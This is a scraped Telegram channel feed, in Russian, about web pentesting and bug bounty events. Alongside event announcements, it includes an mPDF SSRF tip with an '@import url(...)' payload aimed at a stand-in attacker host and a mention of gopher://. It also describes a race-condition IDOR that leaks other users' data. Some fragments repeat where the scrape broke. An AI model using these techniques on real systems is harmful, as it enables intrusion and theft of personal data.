Искал тут что посмотреть под еду на ютубе, и реки вывели мне сей шедевр. Прекрасно все, начиная с кулстори самого проекта, который форсили во многих изданиях, заканчивая сайтом на пыхе с паролями юзеров в открытом виде.
https://www.youtube.com/watch?v=HGbP2ibfm8k
https://www.youtube.com/watch?v=HGbP2ibfm8k
YouTube
ВЗЛОМАН САЙТ автомобиля МОНАРХ? ЭТО ПОЛНЫЙ ПРОВАЛ
❗ Иногда одной некорректной настройки достаточно, чтобы веб-ресурс оказался под угрозой.
В этом видео я подробно разбираю механизм проведения атак, причины отказа защитных систем и способы выявления уязвимостей — на примере сайта автомобиля Монарх.
⚠️ Материал…
В этом видео я подробно разбираю механизм проведения атак, причины отказа защитных систем и способы выявления уязвимостей — на примере сайта автомобиля Монарх.
⚠️ Материал…
1😁21
У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с
Причина проста: mPDF ищет URL-ы через регулярки по всему входу. Поэтому достаточно вставить:
и сервер сразу пойдёт по указанному адресу. Плюс можно использовать и нестандартные протоколы вроде
Вендор же официально заявил, что это не баг, а фича, и устранять поведение не собирается - по их мнению, движок должен загружать указанные URL, а ответственность за реализацию лежит на разработчиках.
#web #ssrf #pdf
@import url(...), он делает внешний запрос, даже если HTML полностью экранирован htmlentities() и даже без <style>.Причина проста: mPDF ищет URL-ы через регулярки по всему входу. Поэтому достаточно вставить:
@import url(https://attacker.com/test?.css)и сервер сразу пойдёт по указанному адресу. Плюс можно использовать и нестандартные протоколы вроде
gopher://, превращая это в SSRF с возможностью дергать внутренние сервисы.Вендор же официально заявил, что это не баг
#web #ssrf #pdf
🔥23👍12😁5
Forwarded from BI.ZONE Bug Bounty
Все это ждет вас на нашем любимом приватном ивенте — BUGS ZONE 7.0.
Приглашения, как обычно, отправим багхантерам с лучшими результатами за сезон.
Попасть на ивент может каждый. Сдавайте отчеты на нашей платформе и качайте рейтинг — мы обязательно заметим самых активных.
Скоро поделимся подробностями. Следите за апдейтами!
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍10
Стартовал прием заявок на Pentest Award 2026 и в этом году появилась новая номинация - AI. Думаю, за последний год у многих есть что сказать по этой теме.
Остальные номинации также на месте: Kill Chain, Системный взлом (Web & Logic), Device и Out of Scope. Среди призов стандартно респект от комьюнити и техника Apple.
Заявки принимают до 12 июля, а церемония награждения пройдет 14 августа в мск.
https://t.iss.one/justsecurity/441
Остальные номинации также на месте: Kill Chain, Системный взлом (Web & Logic), Device и Out of Scope. Среди призов стандартно респект от комьюнити и техника Apple.
Заявки принимают до 12 июля, а церемония награждения пройдет 14 августа в мск.
https://t.iss.one/justsecurity/441
Telegram
Just Security
Pentest award 2026 открывает прием заявок!
Вновь у этичных хакеров появляется возможность громко заявить о своих достижениях. Можно снова делиться наработками, демонстрировать талант и профессионализм. Участники получают вдохновения и новые рабочие инсайты…
Вновь у этичных хакеров появляется возможность громко заявить о своих достижениях. Можно снова делиться наработками, демонстрировать талант и профессионализм. Участники получают вдохновения и новые рабочие инсайты…
🔥14👍4😁1
Race Condition одна из тех уязвимостей, которая порой позволяет находить баги там, где их совсем не ждешь. И иногда, чтобы получить какой-нибудь IDOR, достаточно очень много раз попросить об этом приложение.
В кейсе на скрине, как раз такой случай. При указании чужого
#web #race #idor
В кейсе на скрине, как раз такой случай. При указании чужого
id получаем ошибку, однако, если запустить intruder и подождать несколько тысяч запросов, сервер внезапно начинает отдавать нам чужие ПД.#web #race #idor
53🔥41😁9🤯5
Вокруг все такие молодые, красивые, богатые и успешные, поэтому призываю вас подать свою заявку на OFFZONE, чтобы рассказать, как стать таким же.
Telegram
OFFZONE
⚡️ Запускаем call for papers
Заявку можно подать на сайте до 29 июня (включительно). Там же ищите подробности и требования к докладам.
Как проходит отбор и как лучше оформить заявку, читайте в статье на «Хабре».
Заявку можно подать на сайте до 29 июня (включительно). Там же ищите подробности и требования к докладам.
Как проходит отбор и как лучше оформить заявку, читайте в статье на «Хабре».
😁13🔥10👍2🤔1😢1
Если вы, как и я, откладывали статью до последнего, то пора отправлять.
Telegram
Just Security
Прием заявок на Pentest Award продлится до 12 июля🔥
Много крутых специалистов уже отправили свои кейсы. Не устанем повторять, что наши участники самые смелые и инициативные представители индустрии. Кто еще сомневается, присоединяйтесь, участвуйте!
👉 Отправить…
Много крутых специалистов уже отправили свои кейсы. Не устанем повторять, что наши участники самые смелые и инициативные представители индустрии. Кто еще сомневается, присоединяйтесь, участвуйте!
👉 Отправить…
👍6🔥2
ТБанк вместо одной кнопки "Бабло", прислал сразу три. Осталось переписать скрипт, чтобы сразу Claude запускался.
😁30🔥6
В этом году Pentest Award прошел в атмосфере роскоши, с шикарным видом на набережную и город. Удалось пообщаться с сильными профессионалами и послушать несколько кулстори из их практики. Ну и естественно узнать немного инсайдов непосредственно от победителей. Кстати, итоги церемонии можете глянуть на Хабре. Многие вроде как планируют опубликовать свои работы на хакере, так что в скором времени вы и сами с ними ознакомитесь, там действительно есть уникальные материалы. Отдельное спасибо @popsa_lizaa за приглашение и организацию, все прошло отлично. Кому интересно глянуть фоточки они есть тут, а также есть запись трансляции с самого награждения.
10🔥16